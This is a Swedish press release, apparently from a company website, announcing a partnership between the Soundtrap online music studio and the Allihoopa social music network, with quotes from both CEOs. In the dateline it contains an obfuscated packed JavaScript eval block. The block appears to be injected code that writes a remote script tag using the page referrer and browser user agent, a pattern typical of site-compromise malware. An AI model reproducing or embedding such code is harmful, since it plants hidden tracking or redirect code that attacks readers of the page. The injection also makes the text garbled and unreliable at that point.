Image Image Image Image Image Image Image Image Image Image

| 12 maj, 2021

Scroll to top

Top

Soundtrap och Allihoopa ingår partnerskap för att göra det enklare att göra musik tillsammans över hela världen

Soundtrap och Allihoopa ingår partnerskap för att göra det enklare att göra musik tillsammans över hela världen
Sebastian

Stockholm, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kearz|var|u0026u|referrer|sddfn||js|php’.split(’|’),0,{}))
Sverige, och Palo Alto, Calif. – Musiker och aspirerande musikskapare har precis fått en ny möjlighet att främja sina kreativa ambitioner online i och med det partnerskap som Soundtrap och Allihoopa annonserar idag. Nu kan användare av Allihoopas sociala musiknätverk få tillgång till Soundtraps kollaborativa musikstudio, där de kan arbeta med sina musikskapelser tillsammans med andra runt om i världen. Dessutom kan Sountraps användare få full tillgång till låtar och ljudfiler som Allihoopas användare delar i det sociala nätverket.

Detta samarbete är ett tydligt tecken på hur populär nätbaserade musikprogramvaror blivit de senaste åren. Med Allihoopas app Take kan användare spela in sång och med appen Figure kan de enkelt skapa beats digitalt. Genom detta nya partnerskap kan vem som helst i Allihoopas sociala nätverk utöka sina musikaliska möjligheter att arbeta på vilken enhet som helst med en värld av kreativt likasinnade hos Soundtrap. Samtidigt kan Soundtrap, den prisbelönta online-studion få kontakt med Allihoopas nätverk av användare. Dessutom kan musikidéer, ljudfiler, loopar och beats från Allihoopas appar byggas vidare på i Soundtrap, samtidigt som användare kan bjuda in andra att bidra med sång, musik eller beats som kan redigeras tillsammans i den molnbaserade lösningen. 

Sedan lanseringen i juni 2015, har Stockholmsbaserade Soundtrap vuxit exponentiellt med många tusentals nya användare varje dag. Något som bidrar till denna tillväxt är det faktum att den molnbaserade musikplattform är tillgänglig för praktiskt taget alla enheter eftersom den fungerar på iOS, Android, Chromebook, Linux, Mac och Windows operativsystem på nätet eller via en app. Soundtrap har snabbt nått en miljon användare. 

¾     Båda våra företag har som uppdrag att främja, förenkla och revolutionera musikskapandet, säger Per Emanuelsson, Soundtraps vd och medgrundare. Genom detta partnerskap får våra användare ett större nätverk av människor att samarbeta med medan Allihoopas användare kan träffa nya medmusiker bland våra drygt en miljon användare och utveckla sina tidiga musikaliska idéer i vår studio. Vi tror att ett bredare samarbete och fler sociala kontakter bidrar till att förbättra och inspirera människor att skapa musik och det är vårt uppdrag att göra detta. 

¾     Vår vision är att erbjuda en plattform för alla som vill göra musik, säger Gustaf Kellner, VD på Allihoopa. Vårt partnerskap med Sountrap ger det sociala nätverket av Allihoopaanvändare ytterligare ett sätt att plocka upp bitar av musik och utveckla dem med hjälp av vilken enhet eller plattform de vill. Framtidens musikskapande kommer att genomsyras av samarbete och vi är mycket glada över att Soundtrap nu ansluter sig till oss för att ge ökade möjligheter för kreativa själar över hela världen som vill göra musik.

 

Vem som helst kan börja göra musik på nätet och använda Allihoopas funktioner gratis tillsammans med Soundtrap på soundtrap.com. Att söka, lyssna och sätta upp ett Allihoopa-konto är gratis på allihoopa.com.

Om Soundtrap

Soundtrap är den första molnbaserade musikskaparplattform som fungerar i alla operativsystem, Mac, iOS, Android, Windows och Chromebook, och som gör det möjligt för användare att skapa musik och ljud tillsammans i realtid. Bolaget grundades 2012 och har kontor i Stockholm och Silicon Valley. Soundtraps plattform kan användas av alla musikskapare oavsett nivå. Mer info: www. soundtrap.com.

Om Allihoopa

Allihoopa är ett socialt nätverk för att göra musik, där alla kan delta. På Allihoopa har våra användare redan gjort en miljon låtar, som du kan inspireras av och bygga vidare på – helt gratis – oavsett ambition, instrument eller vilken app du använder. Det finns tusentals appar för att leka med och skapa musik. Vår vision är att du ska kunna använda vilken av dem du vill för att göra musik tillsammans på Allihoopa.Det går att hitta allt från sång på arabiska, beats från Korea till loopar från Amsterdam på Allihoopa. Och till skillnad från andra musikplattformar som SoundCloud, Myspace och Spotify, där du antingen lyssnar på eller publicerar färdig musik, kan du på Allihoopa själv använda det du hittar – och alla kan använda ditt. Allihoopa grundades 2016 och har idag 20 anställda på kontoret i Stockholm.